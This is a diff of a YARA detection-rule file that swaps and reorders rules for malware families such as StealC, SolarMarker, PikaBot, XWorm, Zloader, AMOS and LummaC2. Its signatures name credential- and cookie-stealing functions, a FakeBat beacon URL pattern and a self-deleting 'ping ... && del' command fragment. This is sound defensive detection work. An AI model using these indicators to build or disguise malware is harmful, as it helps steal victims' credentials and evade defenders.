-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_PreGrabber.yar#L1-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/StealC/win_mal_StealC_v2.yar#L1-L12"
 		license_url = "N/A"
-		hash = "f39319312a567fa771921d11ece66f3ce8996ba45f90d6fc89031b621535eb7e"
-		logic_hash = "4fcf9c71d7e6b8b571f8452a19ccf0be6153def54ce6148915535a54711b0ff0"
+		hash = "bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97"
+		logic_hash = "1715ef4e1914a50d8f4a0644ddfd7f9bb2b6f0ec0dfc77615dce4dd5fc943166"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "msgPack"
-		$s2 = "HandlePreGrabber"
-		$s3 = "bdos"
-		$s4 = "uniqueid"
-		$s5 = "mtx"
-		$s6 = "install"
-		$s7 = "mscoree.dll"
+		$s1 = {48 8d ?? ?? ?? ??  00 48 8d}
+		$s2 = {0F B7 C8 81 E9 19 04 00 00 74 14 83 E9 09 74 0F 83 E9 01 74 0A 83 E9 1C 74 05 83 F9 04 75 08}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and #s1 > 500 and all of them and filesize < 900KB
 }
-rule RUSSIANPANDA_Win_Mal_Chromium_App_Bound_Encryption_Decrypter : FILE
+rule RUSSIANPANDA_Fakebat_Powershell
 {
 	meta:
-		description = "Detects Potential Chromium app_bound_encryption key Decrypter"
+		description = "Detects FakeBat PowerShell scripts"
 		author = "RussianPanda"
-		id = "f3c500cb-52d1-5e89-a927-36da6246d2cb"
-		date = "2025-02-13"
-		modified = "2025-02-14"
+		id = "76149a6f-c370-5e48-82cc-c89b545c0aa8"
+		date = "2023-12-01"
+		modified = "2023-12-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_Chromium_app_bound_encryption_Decrypter.yar#L1-L26"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FakeBat/fakebat_powershell.yar#L1-L13"
 		license_url = "N/A"
-		hash = "0f4dcfd8c9ada67a9b41033fc715d370399fd74ca94dbb8a1ea45b3785c88d02"
-		logic_hash = "e871c9a6762c38baeed287e9350530c2c3cd02333b1830210ef74c258bd223b9"
+		logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$op_chr_1 = {E0 60 88 70 41 F6 11 46}
-		$op_chr_2 = {88 95 7D 86 7D D3 67 5B}
-		$op_chr_3 = {CF BE 3A 46 0D 41 7F 40}
-		$op_chr_4 = {8A F5 0D F3 5A 00 5C C8}
-		$op_br_1 = {AF 31 6B 57 69 63 6B 4B}
-		$op_br_2 = {85 60 E4 B2 03 A9 7A 8B}
-		$op_br_3 = {1E 86 96 F3 8E 0C 71 4C}
-		$op_br_4 = {82 56 2F AE 6D 75 9C E9}
-		$op_edg_1 = {6C E9 CB 1F 97 16 AF 43}
-		$op_edg_2 = {91 40 28 97 C7 C6 97 67}
-		$op_edg_3 = {07 B8 C2 C9 31 77 34 4F}
-		$op_edg_4 = {81 B7 44 FF 77 79 52 2B}
-		$riid1 = {CF BE 3A 46 0D 41 7F 40 8A F5 0D F3 5A 00 5C C8}
-		$riid2 = {1E 86 96 F3 8E 0C 71 4C 82 56 2F AE 6D 75 9C E9}
-		$dll1 = "CoCreateInstance"
-		$dll2 = "CoInitializeEx"
+		$s1 = "$LoadDomen/?status=start&av=" nocase
+		$s2 = "$xxx.gpg" nocase
+
+	condition:
+		all of ( $s* )
+}
+rule RUSSIANPANDA_Solardropper
+{
+	meta:
+		description = "SolarMarker first stage detection"
+		author = "RussianPanda"
+		id = "8e40b001-ae00-5768-bb91-e45264748087"
+		date = "2023-06-22"
+		modified = "2024-01-03"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solardropper.yar#L1-L15"
+		license_url = "N/A"
+		logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00}
+		$p2 = "deimos.exe"
+		$p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $dll* ) and all of ( $riid* ) and 8 of ( $op_* )
+		all of ( $p* )
 }
-rule RUSSIANPANDA_Win_Mal_Juniperstealer : FILE
+rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE
 {
 	meta:
-		description = "Detects Juniper Stealer"
+		description = "Detects SolarMarker loader using PS2EXE"
 		author = "RussianPanda"
-		id = "d8ad9175-a226-5e09-a206-b3da42c1db42"
-		date = "2025-02-13"
-		modified = "2025-02-14"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_JuniperStealer.yar#L1-L14"
+		id = "837883a1-b657-52ae-95c4-ebafc8ac55de"
+		date = "2024-01-04"
+		modified = "2024-01-04"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_loader.yar#L1-L17"
 		license_url = "N/A"
-		hash = "44dc2777ee8dd6d5cd8ebb10e71caf73b330940131417b5fca2b174a264e19e3"
-		logic_hash = "e3d05058bbb0e8e408f2b6cf24cb2462b6a3f237c3c464b891cda705b4968c02"
+		hash = "b45c31679c2516b38c7ff8c395f1d11d"
+		logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "OutlookDecryptPwd"
-		$s2 = "CookiesNew"
-		$s3 = "Cookies128"
-		$s4 = "mscoree.dll"
+		$s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70}
+		$s2 = {13 0D 72 [3] 70}
+		$s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize > 200MB
 }
-rule RUSSIANPANDA_Win_Mal_Ghostweaver : FILE
+rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE
 {
 	meta:
-		description = "Detects GhostWeaver backdoor"
+		description = "Detects SolarMarker First Stage payload"
 		author = "RussianPanda"
-		id = "febabd9a-b738-5ed8-b605-4bbef86ce8ac"
-		date = "2025-02-15"
-		modified = "2025-02-15"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_GhostWeaver.yar#L1-L13"
+		id = "56eec644-9ad7-51db-9d11-68ea3e12c36a"
+		date = "2024-01-30"
+		modified = "2024-01-30"
+		reference = "https://x.com/luke92881/status/1751968350689771966?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21"
 		license_url = "N/A"
-		hash = "5051f0aa11da67e16797daa51992467ad45c5bf18dcd2e252e8aa63d3fce31bc"
-		logic_hash = "6901fa0e7d5a911a0029536ac38d9a2a248fa72126114b10ea941cc8b4329d12"
+		hash = "f53563541293a826738d3b8f1164ea43"
+		logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee"
 		score = 75
-		quality = 85
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "$global:keystr"
-		$s2 = "stub"
-		$s3 = "ForEach-Object"
+		$s1 = {63 72 65 64 75 69}
+		$s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73}
+		$s3 = {50 6F 77 65 72 53 68 65 6C 6C}
+		$s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E}
+		$s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E}
+		$s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73}
+		$s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54}
+		$s8 = "_CorExeMain"
 
 	condition:
-		all of them and filesize < 1MB and @s3 > 100
+		all of them and filesize > 250MB
 }
-rule RUSSIANPANDA_Zinfoq : FILE
+rule RUSSIANPANDA_Solarphantom : FILE
 {
 	meta:
-		description = "Detects ZinFoq implant"
+		description = "SolarPhantom Backdoor Detection"
 		author = "RussianPanda"
-		id = "e88a2941-2e73-5dc4-8894-c03236c3a61e"
-		date = "2025-12-08"
-		modified = "2025-12-09"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZinFoq/linux_mal_zinfoq.yar#L1-L13"
+		id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8"
+		date = "2023-06-22"
+		modified = "2023-12-11"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarphantom.yar#L1-L16"
 		license_url = "N/A"
-		hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
-		logic_hash = "e14d7968bc9752550924cd20d7e48622e97aeecd03975de91075cef9d677ab3f"
+		logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = "_FlAg_UuId;;;;;;"
-		$s2 = "interactive_shell"
-		$s3 = "explorer_download"
+		$p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8}
+		$p2 = {68 E8 EF 46 00 FF 75 E4}
+		$p3 = {62 72 76 70 72 66 5f 62 6b 70}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $p* ) and filesize < 600KB
 }
-rule RUSSIANPANDA_Win_Mal_Stealc_V2 : FILE
+
+rule RUSSIANPANDA_Solarmarker_Loader : FILE
 {
 	meta:
-		description = "Detects StealC v2"
+		description = "Detects SolarMarker loader 1-4-2024"
 		author = "RussianPanda"
-		id = "052f4556-ddba-5187-8dcb-138f02bc4c36"
-		date = "2025-04-10"
-		modified = "2025-04-10"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/StealC/win_mal_StealC_v2.yar#L1-L12"
+		id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526"
+		date = "2024-01-04"
+		modified = "2024-01-04"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_backdoor.yar#L3-L19"
 		license_url = "N/A"
-		hash = "bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97"
-		logic_hash = "1715ef4e1914a50d8f4a0644ddfd7f9bb2b6f0ec0dfc77615dce4dd5fc943166"
+		hash = "8eeefe0df0b057fc866b8d35625156de"
+		logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 8d ?? ?? ?? ??  00 48 8d}
-		$s2 = {0F B7 C8 81 E9 19 04 00 00 74 14 83 E9 09 74 0F 83 E9 01 74 0A 83 E9 1C 74 05 83 F9 04 75 08}
+		$s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and #s1 > 500 and all of them and filesize < 900KB
+		all of ( $s* ) and #s1 > 5 and filesize < 7MB and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Jinxloader : FILE
+rule RUSSIANPANDA_Pikabot_1 : FILE
 {
 	meta:
-		description = "Detects JinxLoader Golang version"
+		description = "Detects PikaBot"
 		author = "RussianPanda"
-		id = "25570c99-5938-5be0-a153-a07be0d0571c"
+		id = "e740b821-69cc-5053-9f90-439b4364656f"
 		date = "2024-01-02"
 		modified = "2024-01-02"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16"
+		reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PikaBot/Pikabot_1-2-2024.yar#L1-L16"
 		license_url = "N/A"
-		hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71"
-		logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1"
+		logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63}
-		$s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00}
-		$s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74}
-		$s4 = {48 8D 1D B7 24 08 00 [25] E8 EF FC E4 FF}
+		$s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3}
+		$s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0}
+		$s3 = {8D 53 BF 80 FA 19 0F B6 C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* ) and filesize < 9MB
+		uint16( 0 ) == 0x5A4D and 2 of ( $s* ) and filesize < 500KB
 }
-rule RUSSIANPANDA_Prysmax_Stealer : FILE
+rule RUSSIANPANDA_Ghostgambit : FILE
 {
 	meta:
-		description = "Detects Prysmax Stealer"
+		description = "Detects GhostGambit dropper"
 		author = "RussianPanda"
-		id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380"
-		date = "2024-01-09"
-		modified = "2024-01-10"
-		reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Prysmax Stealer/prysmax_stealer.yar#L1-L21"
+		id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07"
+		date = "2024-07-09"
+		modified = "2024-07-09"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GhostGambit/GhostGambit.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c"
+		hash = "2b16c68d9bafbd2ecf3634d991d7c794"
+		logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1"
 		score = 75
-		quality = 73
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23}
-		$s2 = {73 70 72 79 73 6D 61 78}
-		$s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C}
-		$s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C}
-		$s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C}
-		$s6 = {50 79 49 6E 73 74 61 6C 6C 65 72}
+		$s1 = "/code32" ascii wide
+		$s2 = "/reg32" ascii wide
+		$s3 = "ZhuDongFangYu.exe" ascii wide
+		$s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D and $a1 in ( 9600000 .. filesize ) and #a1 > 600 and filesize > 60MB and filesize < 200MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Bandit_Stealer : FILE
+rule RUSSIANPANDA_Mal_Narniarat : FILE
 {
 	meta:
-		description = "Detects the latest build of Bandit Stealer"
+		description = "Detects NarniaRAT from BotnetFenix campaign"
 		author = "RussianPanda"
-		id = "ed61177d-d70d-5062-8703-f2f2b9d63751"
-		date = "2023-05-05"
-		modified = "2023-05-05"
+		id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c"
+		date = "2024-02-02"
+		modified = "2024-02-02"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/BanditStealer/bandit_stealer.yar#L3-L21"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/NarniaRAT/mal_NarniaRAT.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "304bf05a58d5b762ffe078457739188692f4f7109db929418832c4379b21ae72"
-		score = 50
+		hash = "43f6c3f92a025d12de4c4f14afa5d098"
+		logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 8D 35 ?? ?? B6 FF 48 8D BE DB ?? ?? FF 48 8D 87 AC ?? ?? 00 FF 30 C7 00 ?? ?? ?? ?? 50 57 31 DB 31 C9}
-		$s2 = {48 FF C0 88 17 83 E9 01 8A 10 48 8D 7F 01 75 F0}
+		$s1 = "client-remote desktop"
+		$s2 = "SendDataToServer"
+		$s3 = "SendRunningApps"
+		$s4 = "SendDataToServer"
+		$s5 = "SendKeys"
+		$s6 = "_CorExeMain"
 
 	condition:
-		all of ( $s* ) and ( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x4464c457f ) and pe.sections [ 0 ] . name contains "UPX0" and pe.sections [ 1 ] . name contains "UPX1" and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_WRITE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_WRITE
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule RUSSIANPANDA_Fakebat_Powershell
+rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE
 {
 	meta:
-		description = "Detects FakeBat PowerShell scripts"
+		description = "Detects GoBitLoader"
 		author = "RussianPanda"
-		id = "76149a6f-c370-5e48-82cc-c89b545c0aa8"
-		date = "2023-12-01"
-		modified = "2023-12-01"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/FakeBat/fakebat_powershell.yar#L1-L13"
+		id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36"
+		date = "2024-03-24"
+		modified = "2024-03-24"
+		reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GoBitLoader/win_mal_GoBitLoader.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "df6b30d97ac6c9b248fed0d901e8a0a6ad1d855483a5006b008b839d9961092a"
+		logic_hash = "66951b290bef6a6c9eef4ea674472465dfe0ec5072dce21f48b58191f7ce90e3"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$s1 = "$LoadDomen/?status=start&av=" nocase
-		$s2 = "$xxx.gpg" nocase
+		$s1 = {6D 61 69 6E 2E 52 65 64 69 72 65 63 74 54 6F 50 61 79 6C 6F 61 64}
+		$s2 = {6D 61 69 6E 2E 48 6F 6C 6C 6F 77 50 72 6F 63 65 73 73}
+		$s3 = {6D 61 69 6E 2E 41 65 73 44 65 63 6F 64 65 2E 66 75 6E 63 31}
 
 	condition:
-		all of ( $s* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE
+rule RUSSIANPANDA_Win_Mal_Xworm : FILE
 {
 	meta:
-		description = "Detects AsukaStealer"
+		description = "Detects XWorm RAT"
 		author = "RussianPanda"
-		id = "a718be5f-dc76-5610-9237-038a9719d7e5"
-		date = "2024-02-02"
-		modified = "2024-03-18"
+		id = "5701f382-3c97-5a00-9673-6c39b0f11cc2"
+		date = "2024-03-11"
+		modified = "2024-03-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AsukaStealer/mal_asuka_stealer.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/XWorm/win_mal_XWorm.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4"
+		hash = "fc422800144383ef6e2e0eee37e7d6ba"
+		logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {32 14 3E E8 F6 81 00 00}
-		$s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67}
-		$s3 = {58 00 2D 00 49 00 6E 00 66 00 6F}
+		$s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
+		$s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21}
+		$s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E}
+		$s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
+		$s5 = "_CorExeMain"
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Atomic_Stealer : FILE
+rule RUSSIANPANDA_Win_Mal_Zloader : FILE
 {
 	meta:
-		description = "Detects Atomic Stealer targering MacOS"
+		description = "Detects Zloader and other Zloader modules that employ the same encryption"
 		author = "RussianPanda"
-		id = "259c5c33-0164-568f-aec4-4fe0a2c6d015"
-		date = "2024-01-13"
-		modified = "2024-01-17"
-		reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AtomicStealer/Atomic_Stealer.yar#L1-L27"
+		id = "3f72e067-c82b-5c65-92c8-010955971d87"
+		date = "2024-03-10"
+		modified = "2024-03-10"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Zloader/win_mal_Zloader.yar#L1-L13"
 		license_url = "N/A"
-		hash = "dd8aa38c7f06cb1c12a4d2c0927b6107"
-		logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5"
+		logic_hash = "9ac9e8ca4a6f84e1bccac2292705ee6ebbc1595eb3f40ed777f7973e9bda7fc1"
 		score = 75
-		quality = 58
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85}
-		$s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00}
-		$t1 = {80 75 D?}
-		$t2 = {0F 57 05 ?? 1B 01 00}
-		$t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01}
-		$c1 = {28 ?? 40 39}
-		$c2 = {64 65 73 6B 77 61 6C 6C 65 74 73}
+		$s1 = {8B 45 ?? 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 8B 45 ?? 99 F7 F9 8B 45 ?? 48 63 D2 48 8D 0D ?? ?? ?? 00 0F BE 0C 11 31 C8 88 C2 48 8B 45 F0 48 63 4D}
+		$s2 = {48 63 C9 44 0F B6 04 08 48 8B 45 E8 8B 4D D4 0F B6 14 08 44 31 C2 88 14 08 8B 45 D4}
+		$s3 = {B9 11 00 00 00 99 F7 F9 8B [0-20] 31 C8 88 C2}
+		$s4 = {8B 45 ?? BE 11 00 00 00 99 F7 [0-20] 83 F6 FF}
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and all of ( $s* ) and #s1 > 60 and #s2 > 100 or ( all of ( $t* ) and #t1 > 10 and #t2 > 5 ) or ( #c1 > 200 and $c2 )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule RUSSIANPANDA_Lummac2 : FILE
+rule RUSSIANPANDA_AMOS_Stealer : FILE
 {
 	meta:
-		description = "Detects LummaC2 Stealer"
+		description = "Detects AMOS Stealer"
 		author = "RussianPanda"
-		id = "94d6b63f-066e-59d2-9d14-24c5d5219ba8"
-		date = "2024-09-12"
-		modified = "2024-09-12"
+		id = "481c0abc-efa6-5965-a5b8-0164229130e1"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/LummaC2/LummaC2.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AMOS/amos_stealer_4_25.yar#L1-L24"
 		license_url = "N/A"
-		hash = "988f54f9694dd1ae701bacec3b83c752"
-		logic_hash = "875709f48ff93c8e986f3c1d2e32268bf3458d870082072e7727d8ec85b1a021"
+		hash = "55663778a8c593b77a82ea1be072c73dd6a1d7a9567bbfbfad7d3dec9f672996"
+		logic_hash = "dffaf67bdfb8db07f69fb00720a6638e7a89db2acc1d848d635031a0aec5bdd3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {0F B6 [2-6] 83 ?? 1F}
-		$s2 = {F3 A5 8B 74 24 F8 8B 7C 24 F4 8D 54 24 04 FF 54 24 FC C3}
+		$op1 = {E8 ?? ?? ?? ?? EB 00 48 8D}
+		$op2 = {48 8D BD ?? ?? FF FF E8 ?? ?? 00 00 48 8D BD}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xcafebabf or uint32( 0 ) == 0xbfbafeca ) and ( #op1 > 50000 and #op2 > 4 )
 }
-rule RUSSIANPANDA_Mal_Nitrogen : FILE
+rule RUSSIANPANDA_AMOS_Stealer_1 : FILE
 {
 	meta:
-		description = "Detects Nitrogen campaign"
+		description = "Detects AMOS Stealer"
 		author = "RussianPanda"
-		id = "9d591f87-47ec-54ea-b0ae-26a0542733a0"
-		date = "2024-02-04"
-		modified = "2024-02-04"
+		id = "f2abe03e-7a29-514d-9125-9ec9d0875179"
+		date = "2025-03-31"
+		modified = "2025-04-11"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Nitrogen/mal_nitrogen.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AMOS/amos_stealer.yar#L1-L24"
 		license_url = "N/A"
